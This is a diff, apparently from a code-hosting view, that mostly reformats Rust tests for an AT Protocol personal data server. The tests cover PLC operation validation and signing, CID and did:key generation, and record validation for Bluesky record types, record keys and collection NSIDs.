use std::collections::HashMap;
9
10
fn create_valid_operation() -> serde_json::Value {
11
let key = SigningKey::random(&mut rand::thread_rng());
···
32
assert!(validate_plc_operation(&op).is_ok());
33
34
let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
35
-
assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
36
37
let invalid_type = json!({ "type": "invalid_type", "sig": "test" });
38
-
assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
39
40
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
41
-
assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
42
43
let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
44
-
assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
45
46
let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" });
47
-
assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
48
49
let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" });
50
-
assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
51
52
let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" });
53
-
assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
54
55
-
assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_))));
56
}
57
58
#[test]
···
61
let did_key = signing_key_to_did_key(&key);
62
let server_key = "did:key:zServer123";
63
64
-
let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({
65
-
"type": "plc_operation",
66
-
"rotationKeys": [rotation_key],
67
-
"verificationMethods": {"atproto": signing_key},
68
-
"alsoKnownAs": [format!("at://{}", handle)],
69
-
"services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } },
70
-
"sig": "test"
71
-
});
72
73
let ctx = PlcValidationContext {
74
server_rotation_key: server_key.to_string(),
···
77
expected_pds_endpoint: "https://pds.example.com".to_string(),
78
};
79
80
-
let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
81
-
assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
82
83
let ctx_with_user_key = PlcValidationContext {
84
server_rotation_key: did_key.clone(),
···
87
expected_pds_endpoint: "https://pds.example.com".to_string(),
88
};
89
90
-
let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
91
-
assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
92
93
-
let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
94
-
assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
95
96
-
let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com");
97
-
assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
98
99
-
let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com");
100
-
assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
101
}
102
103
#[test]
···
121
assert!(result.is_ok() && !result.unwrap());
122
123
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
124
-
assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
125
126
let invalid_base64 = json!({
127
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
128
"alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!"
129
});
130
-
assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_))));
131
}
132
133
#[test]
···
136
let cid1 = cid_for_cbor(&value).unwrap();
137
let cid2 = cid_for_cbor(&value).unwrap();
138
assert_eq!(cid1, cid2, "CID should be deterministic");
139
-
assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256");
140
141
let value2 = json!({ "alpha": 999 });
142
let cid3 = cid_for_cbor(&value2).unwrap();
···
145
let key = SigningKey::random(&mut rand::thread_rng());
146
let did = signing_key_to_did_key(&key);
147
assert!(did.starts_with("did:key:z") && did.len() > 50);
148
-
assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did");
149
150
let key2 = SigningKey::random(&mut rand::thread_rng());
151
-
assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids");
152
}
153
154
#[test]
155
fn test_tombstone_operations() {
156
-
let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" });
157
assert!(validate_plc_operation(&tombstone).is_ok());
158
159
let key = SigningKey::random(&mut rand::thread_rng());
···
175
"alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature"
176
});
177
let signed = sign_operation(&op, &key).unwrap();
178
-
assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature");
179
180
let mut services = HashMap::new();
181
-
services.insert("atproto_pds".to_string(), PlcService {
182
-
service_type: "AtprotoPersonalDataServer".to_string(),
183
-
endpoint: "https://pds.example.com".to_string(),
184
-
});
185
let mut verification_methods = HashMap::new();
186
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
187
let op = PlcOperation {
···
1
+
use k256::ecdsa::SigningKey;
2
+
use serde_json::json;
3
+
use std::collections::HashMap;
4
use tranquil_pds::plc::{
5
PlcError, PlcOperation, PlcService, PlcValidationContext, cid_for_cbor, sign_operation,
6
signing_key_to_did_key, validate_plc_operation, validate_plc_operation_for_submission,
7
verify_operation_signature,
8
};
9
10
fn create_valid_operation() -> serde_json::Value {
11
let key = SigningKey::random(&mut rand::thread_rng());
···
32
assert!(validate_plc_operation(&op).is_ok());
33
34
let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
35
+
assert!(
36
+
matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))
37
+
);
38
39
let invalid_type = json!({ "type": "invalid_type", "sig": "test" });
40
+
assert!(
41
+
matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))
42
+
);
43
44
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
45
+
assert!(
46
+
matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))
47
+
);
48
49
let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
50
+
assert!(
51
+
matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))
52
+
);
53
54
let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" });
55
+
assert!(
56
+
matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))
57
+
);
58
59
let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" });
60
+
assert!(
61
+
matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))
62
+
);
63
64
let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" });
65
+
assert!(
66
+
matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))
67
+
);
68
69
+
assert!(matches!(
70
+
validate_plc_operation(&json!("not an object")),
71
+
Err(PlcError::InvalidResponse(_))
72
+
));
73
}
74
75
#[test]
···
78
let did_key = signing_key_to_did_key(&key);
79
let server_key = "did:key:zServer123";
80
81
+
let base_op = |rotation_key: &str,
82
+
signing_key: &str,
83
+
handle: &str,
84
+
service_type: &str,
85
+
endpoint: &str| {
86
+
json!({
87
+
"type": "plc_operation",
88
+
"rotationKeys": [rotation_key],
89
+
"verificationMethods": {"atproto": signing_key},
90
+
"alsoKnownAs": [format!("at://{}", handle)],
91
+
"services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } },
92
+
"sig": "test"
93
+
})
94
+
};
95
96
let ctx = PlcValidationContext {
97
server_rotation_key: server_key.to_string(),
···
100
expected_pds_endpoint: "https://pds.example.com".to_string(),
101
};
102
103
+
let op = base_op(
104
+
&did_key,
105
+
&did_key,
106
+
"test.handle",
107
+
"AtprotoPersonalDataServer",
108
+
"https://pds.example.com",
109
+
);
110
+
assert!(
111
+
matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))
112
+
);
113
114
let ctx_with_user_key = PlcValidationContext {
115
server_rotation_key: did_key.clone(),
···
118
expected_pds_endpoint: "https://pds.example.com".to_string(),
119
};
120
121
+
let wrong_signing = base_op(
122
+
&did_key,
123
+
"did:key:zWrongKey",
124
+
"test.handle",
125
+
"AtprotoPersonalDataServer",
126
+
"https://pds.example.com",
127
+
);
128
+
assert!(
129
+
matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))
130
+
);
131
132
+
let wrong_handle = base_op(
133
+
&did_key,
134
+
&did_key,
135
+
"wrong.handle",
136
+
"AtprotoPersonalDataServer",
137
+
"https://pds.example.com",
138
+
);
139
+
assert!(
140
+
matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))
141
+
);
142
143
+
let wrong_service_type = base_op(
144
+
&did_key,
145
+
&did_key,
146
+
"test.handle",
147
+
"WrongServiceType",
148
+
"https://pds.example.com",
149
+
);
150
+
assert!(
151
+
matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))
152
+
);
153
154
+
let wrong_endpoint = base_op(
155
+
&did_key,
156
+
&did_key,
157
+
"test.handle",
158
+
"AtprotoPersonalDataServer",
159
+
"https://wrong.endpoint.com",
160
+
);
161
+
assert!(
162
+
matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))
163
+
);
164
}
165
166
#[test]
···
184
assert!(result.is_ok() && !result.unwrap());
185
186
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
187
+
assert!(
188
+
matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))
189
+
);
190
191
let invalid_base64 = json!({
192
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
193
"alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!"
194
});
195
+
assert!(matches!(
196
+
verify_operation_signature(&invalid_base64, &[]),
197
+
Err(PlcError::InvalidResponse(_))
198
+
));
199
}
200
201
#[test]
···
204
let cid1 = cid_for_cbor(&value).unwrap();
205
let cid2 = cid_for_cbor(&value).unwrap();
206
assert_eq!(cid1, cid2, "CID should be deterministic");
207
+
assert!(
208
+
cid1.starts_with("bafyrei"),
209
+
"CID should be dag-cbor + sha256"
210
+
);
211
212
let value2 = json!({ "alpha": 999 });
213
let cid3 = cid_for_cbor(&value2).unwrap();
···
216
let key = SigningKey::random(&mut rand::thread_rng());
217
let did = signing_key_to_did_key(&key);
218
assert!(did.starts_with("did:key:z") && did.len() > 50);
219
+
assert_eq!(
220
+
did,
221
+
signing_key_to_did_key(&key),
222
+
"Same key should produce same did"
223
+
);
224
225
let key2 = SigningKey::random(&mut rand::thread_rng());
226
+
assert_ne!(
227
+
did,
228
+
signing_key_to_did_key(&key2),
229
+
"Different keys should produce different dids"
230
+
);
231
}
232
233
#[test]
234
fn test_tombstone_operations() {
235
+
let tombstone =
236
+
json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" });
237
assert!(validate_plc_operation(&tombstone).is_ok());
238
239
let key = SigningKey::random(&mut rand::thread_rng());
···
255
"alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature"
256
});
257
let signed = sign_operation(&op, &key).unwrap();
258
+
assert_ne!(
259
+
signed.get("sig").and_then(|v| v.as_str()).unwrap(),
260
+
"old_signature"
261
+
);
262
263
let mut services = HashMap::new();
264
+
services.insert(
265
+
"atproto_pds".to_string(),
266
+
PlcService {
267
+
service_type: "AtprotoPersonalDataServer".to_string(),
268
+
endpoint: "https://pds.example.com".to_string(),
269
+
},
270
+
);
271
let mut verification_methods = HashMap::new();
272
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
273
let op = PlcOperation {
+191
-44
tests/record_validation.rs
+191
-44
tests/record_validation.rs
···
1
use tranquil_pds::validation::{
2
RecordValidator, ValidationError, ValidationStatus, validate_collection_nsid,
3
validate_record_key,
4
};
5
-
use serde_json::json;
6
7
fn now() -> String {
8
chrono::Utc::now().to_rfc3339()
···
17
"text": "Hello world!",
18
"createdAt": now()
19
});
20
-
assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
21
22
let missing_text = json!({
23
"$type": "app.bsky.feed.post",
24
"createdAt": now()
25
});
26
-
assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text"));
27
28
let missing_created_at = json!({
29
"$type": "app.bsky.feed.post",
30
"text": "Hello"
31
});
32
-
assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt"));
33
34
let text_too_long = json!({
35
"$type": "app.bsky.feed.post",
36
"text": "a".repeat(3001),
37
"createdAt": now()
38
});
39
-
assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text"));
40
41
let text_at_limit = json!({
42
"$type": "app.bsky.feed.post",
43
"text": "a".repeat(3000),
44
"createdAt": now()
45
});
46
-
assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
47
48
let too_many_langs = json!({
49
"$type": "app.bsky.feed.post",
···
51
"createdAt": now(),
52
"langs": ["en", "fr", "de", "es"]
53
});
54
-
assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
55
56
let three_langs_ok = json!({
57
"$type": "app.bsky.feed.post",
···
59
"createdAt": now(),
60
"langs": ["en", "fr", "de"]
61
});
62
-
assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
63
64
let too_many_tags = json!({
65
"$type": "app.bsky.feed.post",
···
67
"createdAt": now(),
68
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
69
});
70
-
assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
71
72
let eight_tags_ok = json!({
73
"$type": "app.bsky.feed.post",
···
75
"createdAt": now(),
76
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
77
});
78
-
assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
79
80
let tag_too_long = json!({
81
"$type": "app.bsky.feed.post",
···
83
"createdAt": now(),
84
"tags": ["t".repeat(641)]
85
});
86
-
assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
87
}
88
89
#[test]
···
95
"displayName": "Test User",
96
"description": "A test user profile"
97
});
98
-
assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
99
100
let empty_ok = json!({
101
"$type": "app.bsky.actor.profile"
102
});
103
-
assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
104
105
let displayname_too_long = json!({
106
"$type": "app.bsky.actor.profile",
107
"displayName": "n".repeat(641)
108
});
109
-
assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
110
111
let description_too_long = json!({
112
"$type": "app.bsky.actor.profile",
113
"description": "d".repeat(2561)
114
});
115
-
assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description"));
116
}
117
118
#[test]
···
127
},
128
"createdAt": now()
129
});
130
-
assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid);
131
132
let missing_subject = json!({
133
"$type": "app.bsky.feed.like",
134
"createdAt": now()
135
});
136
-
assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject"));
137
138
let missing_subject_uri = json!({
139
"$type": "app.bsky.feed.like",
···
142
},
143
"createdAt": now()
144
});
145
-
assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri")));
146
147
let invalid_subject_uri = json!({
148
"$type": "app.bsky.feed.like",
···
152
},
153
"createdAt": now()
154
});
155
-
assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
156
157
let valid_repost = json!({
158
"$type": "app.bsky.feed.repost",
···
162
},
163
"createdAt": now()
164
});
165
-
assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid);
166
167
let repost_missing_subject = json!({
168
"$type": "app.bsky.feed.repost",
169
"createdAt": now()
170
});
171
-
assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject"));
172
}
173
174
#[test]
···
180
"subject": "did:plc:test12345",
181
"createdAt": now()
182
});
183
-
assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid);
184
185
let missing_follow_subject = json!({
186
"$type": "app.bsky.graph.follow",
187
"createdAt": now()
188
});
189
-
assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject"));
190
191
let invalid_follow_subject = json!({
192
"$type": "app.bsky.graph.follow",
193
"subject": "not-a-did",
194
"createdAt": now()
195
});
196
-
assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
197
198
let valid_block = json!({
199
"$type": "app.bsky.graph.block",
200
"subject": "did:plc:blocked123",
201
"createdAt": now()
202
});
203
-
assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid);
204
205
let invalid_block_subject = json!({
206
"$type": "app.bsky.graph.block",
207
"subject": "not-a-did",
208
"createdAt": now()
209
});
210
-
assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
211
}
212
213
#[test]
···
220
"purpose": "app.bsky.graph.defs#modlist",
221
"createdAt": now()
222
});
223
-
assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid);
224
225
let list_name_too_long = json!({
226
"$type": "app.bsky.graph.list",
···
228
"purpose": "app.bsky.graph.defs#modlist",
229
"createdAt": now()
230
});
231
-
assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
232
233
let list_empty_name = json!({
234
"$type": "app.bsky.graph.list",
···
236
"purpose": "app.bsky.graph.defs#modlist",
237
"createdAt": now()
238
});
239
-
assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
240
241
let valid_list_item = json!({
242
"$type": "app.bsky.graph.listitem",
···
244
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
245
"createdAt": now()
246
});
247
-
assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid);
248
}
249
250
#[test]
···
257
"displayName": "My Feed",
258
"createdAt": now()
259
});
260
-
assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid);
261
262
let generator_displayname_too_long = json!({
263
"$type": "app.bsky.feed.generator",
···
265
"displayName": "f".repeat(241),
266
"createdAt": now()
267
});
268
-
assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
269
270
let valid_threadgate = json!({
271
"$type": "app.bsky.feed.threadgate",
272
"post": "at://did:plc:test/app.bsky.feed.post/123",
273
"createdAt": now()
274
});
275
-
assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid);
276
277
let valid_labeler = json!({
278
"$type": "app.bsky.labeler.service",
···
281
},
282
"createdAt": now()
283
});
284
-
assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid);
285
}
286
287
#[test]
···
293
"$type": "com.custom.record",
294
"data": "test"
295
});
296
-
assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown);
297
-
assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_))));
298
299
let type_mismatch = json!({
300
"$type": "app.bsky.feed.like",
···
309
let missing_type = json!({
310
"text": "Hello"
311
});
312
-
assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType)));
313
314
let not_object = json!("just a string");
315
-
assert!(matches!(validator.validate(¬_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_))));
316
317
let valid_datetime = json!({
318
"$type": "app.bsky.feed.post",
319
"text": "Test",
320
"createdAt": "2024-01-15T10:30:00.000Z"
321
});
322
-
assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
323
324
let datetime_with_offset = json!({
325
"$type": "app.bsky.feed.post",
326
"text": "Test",
327
"createdAt": "2024-01-15T10:30:00+05:30"
328
});
329
-
assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
330
331
let invalid_datetime = json!({
332
"$type": "app.bsky.feed.post",
333
"text": "Test",
334
"createdAt": "2024/01/15"
335
});
336
-
assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. })));
337
}
338
339
#[test]
···
345
assert!(validate_record_key("valid~key").is_ok());
346
assert!(validate_record_key("self").is_ok());
347
348
-
assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_))));
349
350
assert!(validate_record_key(".").is_err());
351
assert!(validate_record_key("..").is_err());
···
355
assert!(validate_record_key("invalid@key").is_err());
356
assert!(validate_record_key("invalid#key").is_err());
357
358
-
assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_))));
359
assert!(validate_record_key(&"k".repeat(512)).is_ok());
360
}
361
···
366
assert!(validate_collection_nsid("a.b.c").is_ok());
367
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
368
369
-
assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_))));
370
371
assert!(validate_collection_nsid("a").is_err());
372
assert!(validate_collection_nsid("a.b").is_err());
···
1
+
use serde_json::json;
2
use tranquil_pds::validation::{
3
RecordValidator, ValidationError, ValidationStatus, validate_collection_nsid,
4
validate_record_key,
5
};
6
7
fn now() -> String {
8
chrono::Utc::now().to_rfc3339()
···
17
"text": "Hello world!",
18
"createdAt": now()
19
});
20
+
assert_eq!(
21
+
validator
22
+
.validate(&valid_post, "app.bsky.feed.post")
23
+
.unwrap(),
24
+
ValidationStatus::Valid
25
+
);
26
27
let missing_text = json!({
28
"$type": "app.bsky.feed.post",
29
"createdAt": now()
30
});
31
+
assert!(
32
+
matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text")
33
+
);
34
35
let missing_created_at = json!({
36
"$type": "app.bsky.feed.post",
37
"text": "Hello"
38
});
39
+
assert!(
40
+
matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt")
41
+
);
42
43
let text_too_long = json!({
44
"$type": "app.bsky.feed.post",
45
"text": "a".repeat(3001),
46
"createdAt": now()
47
});
48
+
assert!(
49
+
matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text")
50
+
);
51
52
let text_at_limit = json!({
53
"$type": "app.bsky.feed.post",
54
"text": "a".repeat(3000),
55
"createdAt": now()
56
});
57
+
assert_eq!(
58
+
validator
59
+
.validate(&text_at_limit, "app.bsky.feed.post")
60
+
.unwrap(),
61
+
ValidationStatus::Valid
62
+
);
63
64
let too_many_langs = json!({
65
"$type": "app.bsky.feed.post",
···
67
"createdAt": now(),
68
"langs": ["en", "fr", "de", "es"]
69
});
70
+
assert!(
71
+
matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs")
72
+
);
73
74
let three_langs_ok = json!({
75
"$type": "app.bsky.feed.post",
···
77
"createdAt": now(),
78
"langs": ["en", "fr", "de"]
79
});
80
+
assert_eq!(
81
+
validator
82
+
.validate(&three_langs_ok, "app.bsky.feed.post")
83
+
.unwrap(),
84
+
ValidationStatus::Valid
85
+
);
86
87
let too_many_tags = json!({
88
"$type": "app.bsky.feed.post",
···
90
"createdAt": now(),
91
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
92
});
93
+
assert!(
94
+
matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags")
95
+
);
96
97
let eight_tags_ok = json!({
98
"$type": "app.bsky.feed.post",
···
100
"createdAt": now(),
101
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
102
});
103
+
assert_eq!(
104
+
validator
105
+
.validate(&eight_tags_ok, "app.bsky.feed.post")
106
+
.unwrap(),
107
+
ValidationStatus::Valid
108
+
);
109
110
let tag_too_long = json!({
111
"$type": "app.bsky.feed.post",
···
113
"createdAt": now(),
114
"tags": ["t".repeat(641)]
115
});
116
+
assert!(
117
+
matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))
118
+
);
119
}
120
121
#[test]
···
127
"displayName": "Test User",
128
"description": "A test user profile"
129
});
130
+
assert_eq!(
131
+
validator
132
+
.validate(&valid, "app.bsky.actor.profile")
133
+
.unwrap(),
134
+
ValidationStatus::Valid
135
+
);
136
137
let empty_ok = json!({
138
"$type": "app.bsky.actor.profile"
139
});
140
+
assert_eq!(
141
+
validator
142
+
.validate(&empty_ok, "app.bsky.actor.profile")
143
+
.unwrap(),
144
+
ValidationStatus::Valid
145
+
);
146
147
let displayname_too_long = json!({
148
"$type": "app.bsky.actor.profile",
149
"displayName": "n".repeat(641)
150
});
151
+
assert!(
152
+
matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
153
+
);
154
155
let description_too_long = json!({
156
"$type": "app.bsky.actor.profile",
157
"description": "d".repeat(2561)
158
});
159
+
assert!(
160
+
matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description")
161
+
);
162
}
163
164
#[test]
···
173
},
174
"createdAt": now()
175
});
176
+
assert_eq!(
177
+
validator
178
+
.validate(&valid_like, "app.bsky.feed.like")
179
+
.unwrap(),
180
+
ValidationStatus::Valid
181
+
);
182
183
let missing_subject = json!({
184
"$type": "app.bsky.feed.like",
185
"createdAt": now()
186
});
187
+
assert!(
188
+
matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject")
189
+
);
190
191
let missing_subject_uri = json!({
192
"$type": "app.bsky.feed.like",
···
195
},
196
"createdAt": now()
197
});
198
+
assert!(
199
+
matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri"))
200
+
);
201
202
let invalid_subject_uri = json!({
203
